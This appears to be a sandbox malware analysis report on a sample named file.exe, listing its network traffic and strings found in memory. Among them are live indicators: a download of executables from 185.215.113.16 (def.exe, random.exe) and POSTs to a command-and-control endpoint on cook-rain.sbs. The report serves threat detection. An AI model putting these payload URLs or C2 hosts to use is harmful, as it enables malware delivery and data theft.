              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
              Source: file.exe, 00000000.00000003.1608807253.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000002.1677932889.0000000000CFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000002.1678088995.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeI
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_114.7.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1408794426.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_114.7.dr, chromecache_77.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_114.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_114.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_114.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
              Source: file.exe, 00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435026656.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/Af
              Source: file.exe, 00000000.00000003.1384947171.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/Hf
              Source: file.exe, 00000000.00000003.1384947171.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/Wf
              Source: file.exe, 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
              Source: file.exe, 00000000.00000003.1608864817.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api_
              Source: file.exe, 00000000.00000003.1408564784.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409004952.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1408596086.0000000000F6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apibe
              Source: file.exe, 00000000.00000003.1608864817.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apigs
              Source: file.exe, 00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435026656.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/zf
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_114.7.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
              Source: chromecache_114.7.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: chromecache_106.7.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_106.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1362400904.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362301330.00000000056CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1410078030.00000000056AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: chromecache_95.7.dr, chromecache_106.7.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1409785143.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
